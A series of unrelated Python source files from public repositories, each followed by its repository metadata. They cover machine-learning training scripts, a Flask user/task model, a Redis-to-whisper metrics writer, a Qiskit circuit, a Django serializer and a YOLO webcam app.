batch_size = sys.argv[2]
end_epoch = sys.argv[3]
hidden_units = sys.argv[4]
hidden_layers = sys.argv[5]
Sampling = sys.argv[6]
X_train_path = sys.argv[7]
Y_train_path = sys.argv[8]
eval_path = sys.argv[9]
if str(name) == 'sln':
feed_forward = sln.ff(name,batch_size,hidden_units,1,end_epoch)
feed_forward.run(Sampling,X_train_path,Y_train_path, eval_path)
elif name == 'cnn':
cnn_net = cn.cnn(name,batch_size,hidden_units,1,end_epoch)
cnn_net.run(Sampling,X_train_path,Y_train_path, eval_path)
elif name == 'mln':
feed_forward = mln.ff(name,batch_size,hidden_units,hidden_layers,end_epoch)
feed_forward.run(Sampling,X_train_path,Y_train_path, eval_path)
if __name__ == '__main__':
main()
| [
"jhnnytny@gmail.com"
] | jhnnytny@gmail.com |
f604575cfbcc7e91c6864a85feb5527cce1b9e01 | 2489f15231913f423d3c528b61dc121447eb4875 | /models.py | 00c31866979ba38e21880d6e62708c868778effc | [] | no_license | JBarmentlo/Remote-Control-DB | 0f92ed1e87120bb1504b00e78da0462e2cb63266 | 9181765c3f16c4d116945d353eec56ebd86a74f5 | refs/heads/main | 2023-04-14T03:45:07.246007 | 2021-04-26T09:11:12 | 2021-04-26T09:11:12 | 357,155,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,876 | py | from init import db
from sqlalchemy.types import String, TypeDecorator
import datetime
class HexByteString(TypeDecorator):
"""Convert Python bytestring to string with hexadecimal digits and back for storage."""
impl = String
def process_bind_param(self, value, dialect):
if not isinstance(value, bytes):
raise TypeError("HexByteString columns support only bytes values.")
return value.hex()
def process_result_value(self, value, dialect):
return bytes.fromhex(value) if value else None
class User(db.Model):
__tablename__ = 'users'
# id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(), primary_key=True)
pas = db.Column(HexByteString)
mail = db.Column(db.String())
authenticated = db.Column(db.Boolean, default=False)
# tasks = relationship("Task")
def __init__(self, username, pas, mail, authenticated = False):
self.username = username
self.pas = pas
self.mail = mail
self.authenticated = authenticated
def is_active(self):
"""True, as all users are active."""
return True
def get_id(self):
"""Return the username to satisfy Flask-Login's requirements."""
return self.username
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.authenticated
def is_anonymous(self):
"""False, as anonymous users aren't supported."""
return False
def __repr__(self):
return '<user {}>'.format(self.username)
class Task(db.Model):
__tablename__ = 'tasks'
task_id = db.Column(db.Integer(), primary_key = True)
task = db.Column(db.String())
username = db.Column(db.String())
status = db.Column(db.String())
date = db.Column(db.String())
start_date = db.Column(db.String())
end_date = db.Column(db.String())
# user = db.Column(sb.String, ForeignKey('users.username'))
def __init__(self, task_id, task, username, status = "pending", start_date = "", end_date = ""):
self.id = task_id
self.task = task
self.username = username
self.status = status
self.date = str(datetime.datetime.now())
self.start_date = start_date
self.end_date = end_date
self.set_run_time()
def get_run_time(self):
try:
return str(datetime.datetime.strptime(self.end_date, '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.strptime(self.start_date, '%Y-%m-%d %H:%M:%S.%f')).split('.')[0]
except:
return ""
def set_run_time(self):
try:
self.execution_time = str(datetime.datetime.strptime(self.end_date, '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.strptime(self.start_date, '%Y-%m-%d %H:%M:%S.%f')).split('.')[0]
except:
self.execution_time = "" | [
"joepbarmentlo@gmail.com"
] | joepbarmentlo@gmail.com |
f5308c737fb3468863c69513b0b3872646c9da83 | f9bc9f5b713a49ae4c3ad726d6a57d48dd3360ff | /test2.py | 4631b48fbe4e8d088f717dc1a7c69e0f52f2df84 | [] | no_license | ahrooran/python-commands | 0203216cf601229325398a15ea1f9f5474853729 | a9d540f9b1f6b098c93f002a8df1fa570d1c022f | refs/heads/master | 2020-05-26T21:49:35.162250 | 2019-06-02T14:47:06 | 2019-06-02T14:47:06 | 188,386,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py |
print("Enter your marks:")
p = int(input("What's your marks for Physics? "))
c = int(input("What's your marks for Chemistry? "))
m = int(input("What's your marks Maths? "))
total = p+c+m
per=total*100/450
outof=150*3
print("----------------MARKS----------------")
print("Physics:", p)
print("Chemistry:", c)
print("Maths:", m)
print("-------------------------------------")
print("Total:", total, "out of", outof)
print("Percentage:", per,"%")
print("-------------------------------------")
| [
"noreply@github.com"
] | ahrooran.noreply@github.com |
3e2adce14d0306263670dc98a5d4ce21d48cf953 | 777e913ab14043774bcd1ce839bffca12efba424 | /home/sum-numbers.py | b5371413b384f99454a8a7408ecbc898414e83c5 | [] | no_license | PetrStar/py.checkio.org | 4e2c5c8d2045ecfa228e53645ec0dde78f7d253c | 83ec499baf874707e3f49910a2499c37d76b195b | refs/heads/main | 2023-01-23T15:14:58.031805 | 2020-12-03T19:57:51 | 2020-12-03T19:57:51 | 318,291,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | def sum_numbers(text: str) -> int:
return sum([int(word) for word in text.split() if word.isdigit()])
if __name__ == '__main__':
print("Example:")
print(sum_numbers('hi'))
# These "asserts" are used for self-checking and not for an auto-testing
assert sum_numbers('hi') == 0
assert sum_numbers('who is 1st here') == 0
assert sum_numbers('my numbers is 2') == 2
assert sum_numbers('This picture is an oil on canvas '
'painting by Danish artist Anna '
'Petersen between 1845 and 1910 year') == 3755
assert sum_numbers('5 plus 6 is') == 11
assert sum_numbers('') == 0
print("Coding complete? Click 'Check' to earn cool rewards!")
| [
"noreply@github.com"
] | PetrStar.noreply@github.com |
8bafb18de3c09b4e845ad8d2df44676d5617bfad | 3e3743928f43aaef5cfb72e257b6f091fc2a39cb | /src/whirlwind/tornado/carbon/persist.py | 6a4360ba75d08129ad746ac60e9c350f75c12a51 | [
"Apache-2.0"
] | permissive | bearstech/whirlwind-tornado | 3871862944f584816a1d90891cec815f64209e14 | 85b9e6b4b3413694cb6e5040ce5c72b6e5e436ac | refs/heads/master | 2021-01-18T14:10:05.666763 | 2020-10-13T09:47:05 | 2020-10-13T09:47:05 | 10,527,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | import time
import struct
import os.path
import os
import whisper
from redis import StrictRedis as Redis
from whirlwind import target_to_path
METRICS = 'metrics'
PERIOD = 30
METRIC_WRITE = 'carbon.write'
METRIC_POINTS = 'carbon.points'
class Persist(object):
""" Sequential writer for Carbon server.
The story is simple, fetch data from redis, write them, wait, loop.
This code is supervised by Carbon daemon.
"""
def __init__(self, path="/tmp/"):
self.redis = Redis()
self.path = path
self.dirs = set()
self.redis.sadd(METRICS, METRIC_POINTS, METRIC_WRITE)
def metric(self, name, value):
"Add some metrics : make your own dogfood, just before lunch."
timestamp = time.time()
serialized = struct.pack('!ff', timestamp, value)
pipe = self.redis.pipeline()
pipe.zadd(name, timestamp, serialized)
pipe.publish(name, serialized)
pipe.execute()
def run(self):
while True:
before = time.time()
self.handle()
after = time.time()
self.metric(METRIC_WRITE, (after - before) * 1000)
time.sleep(PERIOD - int(before) + int(after))
def handle(self):
points = 0
for metric in self.redis.smembers(METRICS):
values = self.redis.zrange(metric, 0, -1)
points += len(values)
f = target_to_path(self.path, metric)
d = os.path.dirname(f)
if d not in self.dirs:
if not os.path.isdir(d):
os.makedirs(d)
self.dirs.add(d)
if not os.path.exists(f):
whisper.create(f, [(10, 1000)]) # [FIXME] hardcoded values
whisper.update_many(f, [struct.unpack('!ff', a) for a in values])
if len(values):
self.redis.zrem(metric, *values)
self.metric(METRIC_POINTS, points)
if __name__ == "__main__":
p = Persist()
p.run()
| [
"mlecarme@bearstech.com"
] | mlecarme@bearstech.com |
cc4e5646eb53c6b3516812713e6eb457669665f5 | 2e0ea50b016dc3c01bbaca98dd6806d5a1500b47 | /chart.py | 9240adcd3b56a13793c617d63f3fa0f40a75a789 | [] | no_license | ukey123/kusai | d55247826f7323ad534224cd022a3dc0495b3030 | dfe74c2144a09b0480ab95beb4b8171d714c97bd | refs/heads/main | 2023-02-17T08:59:54.224192 | 2021-01-18T06:00:46 | 2021-01-18T06:00:46 | 319,865,503 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | #!/usr/bin/pythonCGI
# -*- coding: utf-8 -*-
from jinja2 import Environment, FileSystemLoader
import sqlite3
import datetime
def mychart(environ, start_response):
env = Environment(loader=FileSystemLoader('/home/pi/Desktop/kusai/', encoding='utf8'))
tpl = env.get_template('template.html')
#テンプレートへ挿入するデータの作成
title = u"臭いチャート"
temp_list = []
dbpath = '/home/pi/logging'
connection = sqlite3.connect(dbpath)
connection.isolation_level = None
cursor = connection.cursor()
sql = "select 1000 * strftime('%s' , t), v from kusai"
#sql = "select strftime('%s' , t), v from kusai where t > datetime('now', '-24 hours')"
cursor.execute(sql)
records = cursor.fetchall()
for record in records:
temp_list.append({'date': record[0], 'kusai':record[1]})
#temp_list.append({'date':record[0].strftime("%Y-%m-%d %H:%M"), 'kusai':record[1]})
cursor.close()
connection.close()
#テンプレートへ挿入するデータの作成
title = u"臭いチャート"
#テンプレートへの挿入
html = tpl.render({'title':title, 'kusai_list':temp_list})
start_response('200 OK', [('Content-Type', 'text/html')])
return [html.encode('utf-8')]
if __name__ == '__main__':
from flup.server.fcgi import WSGIServer
WSGIServer(mychart).run()
| [
"noreply@github.com"
] | ukey123.noreply@github.com |
dc49aee3b646e4e2864be55fd34519a351e9c3ad | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R1/benchmark/startQiskit_noisy83.py | 997aaa1938fcb497d01eab2eff9be00509126ac8 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,391 | py | # qubit number=3
# total number=9
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.swap(input_qubit[1],input_qubit[0]) # number=5
prog.swap(input_qubit[1],input_qubit[0]) # number=6
prog.y(input_qubit[2]) # number=7
prog.y(input_qubit[2]) # number=8
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5200
writefile = open("../data/startQiskit_noisy83.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = FakeYorktown()
circuit1 = transpile(prog, FakeYorktown())
circuit1.measure_all()
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
bf9e83df90253e691d8d6d38926265f6665da03b | 4124e6d1a99b40e3e990915969899ba0ddfa9390 | /kaldi/feat/signal.py | 195e85ab397bed43abb22de02e195fa619ca6846 | [
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] | permissive | pykaldi/pykaldi | 23f0554072e99fbfa036be27a1b4d1e08f719525 | b482f79a334383a16a3805d658aa221ca3d23c6d | refs/heads/master | 2023-03-10T06:02:38.465779 | 2022-05-29T21:24:42 | 2022-05-29T21:24:42 | 94,806,200 | 1,019 | 283 | Apache-2.0 | 2022-09-18T13:34:33 | 2017-06-19T18:05:19 | Python | UTF-8 | Python | false | false | 236 | py | from ._resample import *
from ._signal import *
################################################################################
__all__ = [name for name in dir()
if name[0] != '_'
and not name.endswith('Base')]
| [
"dogancanbaz@gmail.com"
] | dogancanbaz@gmail.com |
e680ac98db693298f1bdeb9376fa11577feeb89a | c237e2f29eac2b92bd2b77d055e33cf760960284 | /todobackend/todo/serializers.py | dc073eafa9c9e17d9bdc60cc128b53a776392e7b | [] | no_license | razyesh/Django-TODO-React | 7f3293c858099f8656a287c8706f739b1d513077 | b8529138334710d582324f286c10a39197aca25d | refs/heads/master | 2022-12-11T11:20:33.622468 | 2019-06-28T10:28:03 | 2019-06-28T10:28:03 | 194,255,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | from rest_framework import serializers
from .models import Todo
class TodoSerializer(serializers.ModelSerializer):
class Meta:
model = Todo
fields = (
'id',
'title',
'description',
'completed',
) | [
"pudasainirajesh504@gmail.com"
] | pudasainirajesh504@gmail.com |
739a670634ba4397de44127cb5d1bb66b9097341 | 16512126cbb4a6ba16ea06f11b760e59236baa3b | /a.py | d83227abc60a10620ef008a3fff2dc93f205ae5c | [] | no_license | Aliced3645/CodeForFun | c7fa30465fea75c23851859ced0b89ed7bce9615 | 247c0e896244c8aad324981e8e9ffae374af8f64 | refs/heads/master | 2020-04-06T04:30:08.735734 | 2013-02-28T21:57:37 | 2013-02-28T21:57:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py |
#TODO: try tornado
import sys
sys.path.append("/usr/local/lib/python2.7/dist-packages/")
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RedirectHandler):
def get(self):
self.write("Hello World")
application = tornado.web.Application([
(r"./", MainHandler),
])
if __name__ == "__main__":
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()
| [
"shu_zhang@brown.edu"
] | shu_zhang@brown.edu |
85a34ac290ea296fd6e980ca8103553fd134a68d | d0aac2763f9ca7a4c7e157b3fbf8037915ff4abe | /compass/migrations/0002_auto_20190501_1551.py | 887c4768277b5e547146f92bc3c3e53a40d58481 | [] | no_license | anishpatelwork/RiskCompass | 4563696a345cb9de7a380f4678029f9c96625a4a | 56de749fb0e1674e27dc731394b05ba7880507eb | refs/heads/master | 2022-01-20T08:49:59.737469 | 2019-05-10T10:58:58 | 2019-05-10T10:58:58 | 128,987,628 | 0 | 1 | null | 2019-05-10T09:17:28 | 2018-04-10T19:54:47 | Python | UTF-8 | Python | false | false | 507 | py | # Generated by Django 2.2.1 on 2019-05-01 15:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('compass', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='business_priority',
name='results',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='business_priority', to='compass.Results'),
),
]
| [
"anish.patel2@rms.com"
] | anish.patel2@rms.com |
fa630ede4ee6b303b49df2800a562991fd84f857 | 53278297d92ee3431e9add18d4a5eaf8c240a987 | /streamlitWebCam.py | 3f7a772b2336066003d730503bc7f7f54e326f7a | [] | no_license | Islington1/dissertation_final | e1ecfa2c5499cce0110f8ac1942f35415edaca0c | f10041aefd038aceb5e2b123c6c25ffb22699824 | refs/heads/master | 2023-06-01T07:19:32.882539 | 2021-06-12T10:40:11 | 2021-06-12T10:40:11 | 376,184,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,915 | py | import cv2
import av
import numpy as np
from streamlit_webrtc import *
def web_cam1():
class VideoTransformer(VideoTransformerBase):
def recv(self, frame: av.VideoFrame) -> av.VideoFrame:
net = cv2.dnn.readNet("weights/yolov3.weights", "weights/yolov3.cfg")
classes = []
with open("weights/coco.names", "r") as f:
classes = [line.strip() for line in f.readlines()]
colors = np.random.uniform(0, 255, size=(len(classes), 3))
font = cv2.FONT_HERSHEY_PLAIN
image = frame.to_ndarray(format="bgr24")
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1/255, (320, 320), (0, 0, 0), swapRB = True, crop=False)
net.setInput(blob)
output_layers = net.getUnconnectedOutLayersNames()
outs = net.forward(output_layers)
(height, width) = image.shape[:2]
class_ids = []
confidences = []
boxes = []
for out in outs:
for detection in out:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > 0.4:
# object detected
center_x = int(detection[0] * width)
center_y = int(detection[1] * height)
w = int(detection[2] * width)
h = int(detection[3] * height)
# Rectangle coordinates
x = int(center_x - w / 2)
y = int(center_y - h / 2)
boxes.append([x, y, w, h])
confidences.append(float(confidence))
class_ids.append(class_id)
indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.4, 0.4)
items = [] # Array to store label of detected object(s)
for i in range(len(boxes)):
if i in indexes:
x, y, w, h = boxes[i]
label = str(classes[class_ids[i]])
confidence = str(round(confidences[i], 2))
color = colors[class_ids[i]]
cv2.rectangle(image, (x, y), (x + w, y + h), color, 3)
cv2.putText(image, label + " " + confidence, (x, y + 30), font, 3, color, 3)
items.append(label) # Add the output label of bounded object
#cv2.putText(frame, "FPS: " + str(round(fps, 2)), (10, 50), font, 4, (0, 0, 0), 3)
annotated_image, result = (image, items)
return av.VideoFrame.from_ndarray(annotated_image, format="bgr24")
webrtc_streamer(
key="web-detection",
mode=WebRtcMode.SENDRECV,
video_processor_factory=VideoTransformer,
async_processing=True,
)
| [
"support3@nt.com.np"
] | support3@nt.com.np |
5bb26342a634735c0ded562718ea28a68b5e18e1 | 716b900a6a963b466596dd8dd3b9ceeef9404b76 | /scripts/neuralnet-letter.py | 2905b8a1764023e7add3e8ff07d7d3e4ebbcfb8d | [] | no_license | manleyroberts/mlproject1 | b7646c4de4b724e57eb997ce4ea79267f13eba53 | cbeed7d4bb87d187dcefa58df7599b36d80c9dcb | refs/heads/master | 2020-04-22T02:53:08.377447 | 2019-02-11T04:31:21 | 2019-02-11T04:31:21 | 170,066,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,088 | py | #Source: https://www.geeksforgeeks.org/working-csv-files-python/
from sklearn import tree
from sklearn import svm
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score, confusion_matrix
import csv
import numpy as np
import random
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
from sklearn.model_selection import ShuffleSplit
import seaborn as sn
import pandas as pd
from mpl_toolkits import mplot3d
import os
import string
out = []
csvout = []
x_list = [5]
y_list = list(range(80, 81, 20))
for num_layers in x_list:
newOut = []
for layer_size in y_list:
filename = "../data/letter/letter-recognition.data"
fields = []
rows = []
with open(filename, 'r') as csvfile:
csvreader = csv.reader(csvfile)
fields = next(csvreader)
for row in csvreader:
rows.append(row)
newRows = []
splitvalue = round(len(rows) * 0.8)
trainset = rows[:splitvalue]
testset = rows[splitvalue:]
trainX = [[float((x)) for x in r[1:]] for r in trainset]
trainY = [float(ord(r[0])) for r in trainset]
testX = [[float((x)) for x in r[1:]] for r in testset]
testY = [float(ord(r[0])) for r in testset]
fileout = "NumLayers - " + str(num_layers) + ", LayerSize - " + str(layer_size)
clf = MLPClassifier(solver='lbfgs', max_iter=1500, hidden_layer_sizes=tuple(layer_size for layer in range(num_layers)))
# clf = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(), random_state=1, max_iter=1000)
# clf = svm.SVC(gamma='scale')
newTrainY = []
for r in trainY:
newTrainY = newTrainY + [[r]]
clf = clf.fit((trainX), np.array(newTrainY).ravel())
# import graphviz
# dot_data = tree.export_graphviz(clf, out_file=None)
# graph = graphviz.Source(dot_data)
# graph.overlap ='scale'
# graph.render("../letter-classification//" + fileout + "/tree")
newOut += [accuracy_score(testY, clf.predict(testX))]
csvout += [[str(layer_size), str(num_layers), str(accuracy_score(testY, clf.predict(testX)))]]
print(accuracy_score(testY, clf.predict(testX)))
print(str(accuracy_score(testY, clf.predict(testX), normalize=False)) + " correct of " + str(len(testX)))
filename = "../letter-classification/neural/" + fileout + "/output.txt"
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, "w") as f:
f.write(str(accuracy_score(testY, clf.predict(testX))) + "\n")
f.write(str(accuracy_score(testY, clf.predict(testX), normalize=False)) + " correct of " + str(len(testX)))
out += [newOut]
print(__doc__)
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=None, train_sizes=np.linspace(.1, 1.0, 5)):
"""
Generate a simple plot of the test and training learning curve.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
title : string
Title for the chart.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
ylim : tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`,
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if ``y`` is binary or multiclass,
:class:`StratifiedKFold` used. If the estimator is not a classifier
or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validators that can be used here.
n_jobs : int or None, optional (default=None)
Number of jobs to run in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
train_sizes : array-like, shape (n_ticks,), dtype float or int
Relative or absolute numbers of training examples that will be used to
generate the learning curve. If the dtype is float, it is regarded as a
fraction of the maximum size of the training set (that is determined
by the selected validation method), i.e. it has to be within (0, 1].
Otherwise it is interpreted as absolute sizes of the training sets.
Note that for classification the number of samples usually have to
be big enough to contain at least one sample from each class.
(default: np.linspace(0.1, 1.0, 5))
"""
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Cross-validation score")
plt.legend(loc="best")
return plt
with open("../letter-classification/neural/MASTER.csv", "w") as f:
f.write("num_layers, layer_size, accuracy_score\n")
for row in csvout:
f.write(str(row[0]) + ", " + str(row[1]) + ", " + str(row[2]) + "\n")
max_index = csvout.index(max(csvout, key=lambda x: x[-1]))
num_layers = csvout[max_index][0]
layer_size = csvout[max_index][1]
title = "Learning Curve: Letter Recognition, Neural Net - " + fileout
plt2 = plot_learning_curve(clf, title, trainX, trainY, (0.0, 1.1), cv=5, n_jobs=4, train_sizes=np.linspace(.1, 1.0, 5))
plt2.savefig("../letter-classification/neural/" + fileout + "/learning_curve.png", bbox_inches='tight')
plt2.close()
# https://stackoverflow.com/questions/35572000/how-can-i-plot-a-confusion-matrix
df_cm = pd.DataFrame(confusion_matrix([chr(int(y)) for y in testY], [chr(int(x)) for x in clf.predict(testX)]))
plt.figure(figsize = df_cm.shape)
sn.set(font_scale=1.4)#for label size
s = sn.heatmap(df_cm, annot=True,annot_kws={"size": 16})
s.set_xlabel('Predicted labels')
s.set_ylabel('True labels')
s.xaxis.set_ticklabels(list(string.ascii_uppercase))
s.yaxis.set_ticklabels(list(string.ascii_uppercase));
plt.savefig("../letter-classification/neural/" + fileout + "/confusion_matrix.png", bbox_inches='tight')
plt.close()
fig = plt.figure()
ax = plt.axes(projection='3d')
print(x_list)
print(y_list)
print(out)
print(np.array(out, dtype=np.float64))
ax.contour3D(np.array(x_list), np.array(y_list), np.array(out, dtype=np.float64), 50, cmap='binary')
ax.set_xlabel('num_layers')
ax.set_ylabel('layer_size')
ax.set_zlabel('accuracy_score');
plt.savefig("../letter-classification/neural/MASTER.png")
plt.show() | [
"manleyroberts@gatech.edu"
] | manleyroberts@gatech.edu |
8c3742b2407dc06b1267312520d773fc84bd1c77 | d9deb2cd70e97546d2208d4e60c70e1a8c51efba | /keras-resnet/cifar10_resnet50_keras_kaggle_opt.py | e3367dbb314445ba40af1ac4221c9609ef9242d0 | [
"MIT",
"Apache-2.0"
] | permissive | sashkarivkind/imagewalker | 5353893fd43a096f1844527ab43261d7fb788f24 | 999e1ae78cfe1512e1be894d9e7891a7d0c41233 | refs/heads/master | 2021-11-28T14:31:36.893022 | 2021-11-22T16:01:42 | 2021-11-22T16:01:42 | 166,010,202 | 2 | 1 | MIT | 2021-04-28T13:43:03 | 2019-01-16T09:16:05 | Jupyter Notebook | UTF-8 | Python | false | false | 9,226 | py | # %% [markdown] {"id":"FStp_vbUkRz5"}
#
#
#
# # Transfer Learning
# In this notebook, we will perform transfer learning to train CIFAR-10 dataset on ResNet50 model available in Keras.
#
#
# %% [markdown] {"id":"qpiJj8ym0v0-"}
# ## Imports
# %% [code] {"id":"AoilhmYe1b5t","execution":{"iopub.status.busy":"2021-08-02T17:27:37.867617Z","iopub.execute_input":"2021-08-02T17:27:37.868472Z","iopub.status.idle":"2021-08-02T17:27:45.661016Z","shell.execute_reply.started":"2021-08-02T17:27:37.868405Z","shell.execute_reply":"2021-08-02T17:27:45.659904Z"}}
import os, re, time, json
# import PIL.Image, PIL.ImageFont, PIL.ImageDraw
import numpy as np
import sys
import cv2
# try:
# # %tensorflow_version only exists in Colab.
# % tensorflow_version
# 2.
# x
# except Exception:
# pass
import tensorflow as tf
from tensorflow.keras.applications.resnet50 import ResNet50
from matplotlib import pyplot as plt
import pdb
# import tensorflow_datasets as tfds
print("Tensorflow version " + tf.__version__)
# %% [markdown] {"id":"HuG_q_1jkaZ6"}
# ## Parameters
# %% [markdown] {"id":"v4ocPhg6J_xw"}
# - Define the batch size
# - Define the class (category) names
# %% [code] {"id":"cCpkS9C_H7Tl","execution":{"iopub.status.busy":"2021-08-02T17:27:56.551738Z","iopub.execute_input":"2021-08-02T17:27:56.552154Z","iopub.status.idle":"2021-08-02T17:27:56.557542Z","shell.execute_reply.started":"2021-08-02T17:27:56.552093Z","shell.execute_reply":"2021-08-02T17:27:56.55645Z"}}
BATCH_SIZE = 32
classes = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# %% [markdown] {"id":"O-o96NnyJ_xx"}
# Define some functions that will help us to create some visualizations.
# %% [code] {"id":"CfFqJxrzoj5Q","execution":{"iopub.status.busy":"2021-08-02T17:28:01.661055Z","iopub.execute_input":"2021-08-02T17:28:01.661793Z","iopub.status.idle":"2021-08-02T17:28:01.681885Z","shell.execute_reply.started":"2021-08-02T17:28:01.661731Z","shell.execute_reply":"2021-08-02T17:28:01.680314Z"}}
# Matplotlib config
# plt.rc('image', cmap='gray')
# plt.rc('grid', linewidth=0)
# plt.rc('xtick', top=False, bottom=False, labelsize='large')
# plt.rc('ytick', left=False, right=False, labelsize='large')
# plt.rc('axes', facecolor='F8F8F8', titlesize="large", edgecolor='white')
# plt.rc('text', color='a8151a')
# plt.rc('figure', facecolor='F0F0F0')# Matplotlib fonts
# MATPLOTLIB_FONT_DIR = os.path.join(os.path.dirname(plt.__file__), "mpl-data/fonts/ttf")
# utility to display a row of digits with their predictions
# def display_images(digits, predictions, labels, title):
# n = 10
# indexes = np.random.choice(len(predictions), size=n)
# n_digits = digits[indexes]
# n_predictions = predictions[indexes]
# n_predictions = n_predictions.reshape((n,))
# n_labels = labels[indexes]
# fig = plt.figure(figsize=(20, 4))
# plt.title(title)
# plt.yticks([])
# plt.xticks([])
# for i in range(10):
# ax = fig.add_subplot(1, 10, i+1)
# class_index = n_predictions[i]
# plt.xlabel(classes[class_index])
# plt.xticks([])
# plt.yticks([])
# plt.imshow(n_digits[i])
# # utility to display training and validation curves
# def plot_metrics(metric_name, title, ylim=5):
# plt.title(title)
# plt.ylim(0,ylim)
# plt.plot(history.history[metric_name],color='blue',label=metric_name)
# plt.plot(history.history['val_' + metric_name],color='green',label='val_' + metric_name)
# %% [markdown] {"id":"wPq4Sw5akosT"}
# ## Loading and Preprocessing Data
# [CIFAR-10](https://www.cs.toronto.edu/~kriz/cifar.html) dataset has 32 x 32 RGB images belonging to 10 classes. We will load the dataset from Keras.
